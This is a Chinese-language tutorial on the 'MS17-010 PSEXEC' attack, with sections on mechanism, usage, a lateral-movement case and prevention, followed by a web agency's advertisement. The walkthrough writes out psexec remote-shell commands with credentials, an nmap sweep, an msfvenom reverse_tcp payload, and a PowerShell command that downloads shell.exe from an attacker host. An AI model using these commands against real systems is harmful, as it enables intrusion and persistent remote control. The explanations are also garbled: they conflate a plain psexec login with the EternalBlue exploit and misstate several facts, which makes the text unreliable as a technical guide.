ms17_010_psexec

MS17-010 PSEXEC 是指利用 EternalBlue 漏洞进行攻击，在目标机器上执行命令并获取权限的一种攻击手法，常用于对企业内部的 Windows 系统进行攻击和渗透。在 2017 年初，WannaCry 恶意软件采用了该攻击手法，造成了全球的大面积影响与破坏。

下面将详细介绍 MS17-010 PSEXEC 的工作原理、使用方法和实例说明。

一、工作原理

MS17-010 PSEXEC 利用永恒之蓝（EternalBlue）漏洞，通过 SMB 协议攻击 Windows 系统，具体步骤如下：

1.攻击者首先需要获取目标机器的 IP 地址和操作系统版本信息，以便于选择恰当的攻击载荷。

2.攻击者构造一个 SMB 请求数据包，将代码载荷嵌入其中，并发送给目标机器。

3.由于永恒之蓝漏洞的存在，目标机器无法正确处理 SMB 请求数据包，导致系统内核存在缓冲区溢出漏洞。

4.攻击者利用缓冲区溢出漏洞，向系统内核中注入恶意代码，通过提权获取系统用户权限。

5.攻击者使用 MS17-010 PSEXEC 工具，利用已经获得的系统用户权限，在目标机器上执行命令或上传下载文件等操作。

二、使用方法

1.获取 MS17-010 PSEXEC 工具

MS17-010 PSEXEC 可以通过 GitHub、Metasploit、PowerSploit 等渗透测试工具包中获取，也可以手动下载。

2.设置攻击参数

在使用 MS17-010 PSEXEC 之前，需要设置攻击参数，包括目标机器 IP 地址、用户名和密码等。

例如：

psexec.exe \\192.168.0.1 -u Administrator -p PassWord cmd.exe

表示连接到 IP 地址为 192.168.0.1 的目标机器，使用 Administrator 用户名和 PassWord 密码进行认证，执行 cmd.exe 命令实现远程 shell。

3.执行攻击命令

配置好攻击参数后，可以执行 MS17-010 PSEXEC 工具，连接到远程目标机器，实现执行命令的功能。

例如：

psexec.exe \\192.168.0.1 -u Administrator -p PassWord regedit.exe

表示连接到 IP 地址为 192.168.0.1 的目标机器，使用 Administrator 用户名和 PassWord 密码进行认证，执行 regedit.exe 命令启动注册表编辑器。

三、案例说明

下面以使用 MS17-010 PSEXEC 工具实现横向渗透为例，详细说明其攻击过程。

1.获取目标机器信息

攻击者使用信息收集工具获取目标企业内部网络的 IP 段和主机信息，利用扫描工具扫描内部网络的主机端口和系统信息。

例如使用 Nmap 工具扫描内部网络所有开放的主机和端口：

nmap -sn 192.168.1.0/24

该命令将扫描整个内部网络的 IP 地址，并返回所有活动主机/IP 地址。

2.发现漏洞系统

扫描结束后，攻击者需要审查扫描结果，发现系统存在已知漏洞。例如，在扫描端口时，发现某些主机开放了 SMB 445 端口，说明该主机存在 SMB 的远程漏洞。

3.利用 MS17-010 PSEXEC 工具

攻击者在获取目标机器 IP 地址后，使用 MS17-010 PSEXEC 工具连接到目标机器，并使用管理员权限执行命令。

例如：

psexec.exe \\192.168.0.1 -u Administrator -p PassWord cmd.exe

该命令将连接到 IP 地址为 192.168.0.1 的目标机器，使用 Administrator 用户名和 PassWord 密码进行认证，执行 cmd.exe 命令实现远程 shell。

4.利用漏洞实施攻击

使用成功连接的远程 shell，攻击者可以执行各种命令，例如查看文件、上传下载文件、安装木马程序等。

例如：

dir：查看目录

cd：切换工作目录

xcopy：复制文件

net user：查看当前主机用户信息

net localgroup Administrators：查看本机管理员组信息

5.保持持久性

攻击者通常会使用后门等技术，以便在目标机器上保持访问权限，进行长期监控和信息收集。

例如使用 MSFvenom 工具生成反向 shell 脚本，并上传到目标机器，以便随时连接写入 shell：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe

psexec \\192.168.1.2 -u user -p passsword powershell "Invoke-WebRequest -Uri http://192.168.1.100:8000/shell.exe -OutFile C:\Users\user\Desktop\shell.exe"

以上命令将在目标机器上下载反向 shell 并在 4444 端口监听，攻击者只需要使用 Metasploit 等后渗透工具就可以连接到目标机器并获得更高的权限。

四、预防措施

企业可以采取以下措施，有效防范 MS17-010 PSEXEC 攻击：

1.及时修复漏洞

微软已经在 2017 年 3 月发布了针对 MS17-010 漏洞的修补程序，企业可以及时更新服务器补丁，避免系统存在漏洞。

2.关闭 SMBv1 协议

SMBv1 是 Windows 系统默认启用的协议，存在多种漏洞，容易被黑客攻击利用，企业可以使用 PowerShell 等工具关闭该协议。

3.增强网络安全防护能力

企业应加强网络安全防护能力，采用防火墙、入侵检测、反病毒、审计和日志管理等技术，及时发现和防范攻击。

4.加强员工安全意识教育

企业应切实加强员工安全意识教育，提高员工安全防范意识，促使员工遵守安全规范和流程，避免被黑客攻击利用。

总之，MS17-010 PSEXEC 工具具有恶意化、远程控制等特点，可能造成用户信息泄露、严重的恶意软件感染和系统安全威胁等问题。企业应加强网络安全防护工作，及时修复漏洞，提高安全防范意识和技能，以保障企业信息安全。

壹涵网络我们是一家专注于网站建设、企业营销、网站关键词排名、AI内容生成、新媒体营销和短视频营销等业务的公司。我们拥有一支优秀的团队，专门致力于为客户提供优质的服务。

我们致力于为客户提供一站式的互联网营销服务，帮助客户在激烈的市场竞争中获得更大的优势和发展机会！